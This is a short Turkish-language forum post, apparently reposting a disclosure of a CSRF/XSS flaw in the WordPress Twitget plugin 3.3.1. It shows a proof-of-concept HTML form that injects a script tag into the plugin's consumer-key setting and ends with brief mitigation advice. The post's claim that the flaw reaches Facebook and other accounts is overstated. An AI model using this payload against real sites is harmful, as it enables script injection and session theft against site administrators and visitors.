Wordpress Twitget Plugin 3.3.1 Açığı

0
Onaylı Üye
Üye
Katılım
25 Nisan 2014
Mesajlar
999
Tepki puanı
0
Konum
İzmir
Açık CSRF/XSS vulnerability dediğimiz yani kısaca cookie çalma ve kullanıcının her türlü bilgisini ele geçirme (facebook ve diğer hesaplarda dahil) yetkisine sahip olunabilir.

PHP:
<form action=\"http://localhost/wp-admin/options-general.php?page=twitget/twitget.php\" method=\"POST\">
  <input type=\"text\" name=\"twitget_username\" value=\"john_smith\">
  <input type=\"text\" name=\"twitget_consumer_key\" value=\""><script>alert(\'dxw\')</script>\">
  <input type=\"submit\">
</form>

javascript alert yöntemi ile hata alınabilir ve işlemler devam edilebilir nitelikte.

Hatanın kapatılması: Hatayı kapatabilmeniz için yeni çıkan sürümü ile birlikte sayfa ayarlarınızı yada sitenizi ziyaretçilere kapatarak sadece üyelerin erişebilirliğini sağlayabilirsiniz.
 
Geri
Üst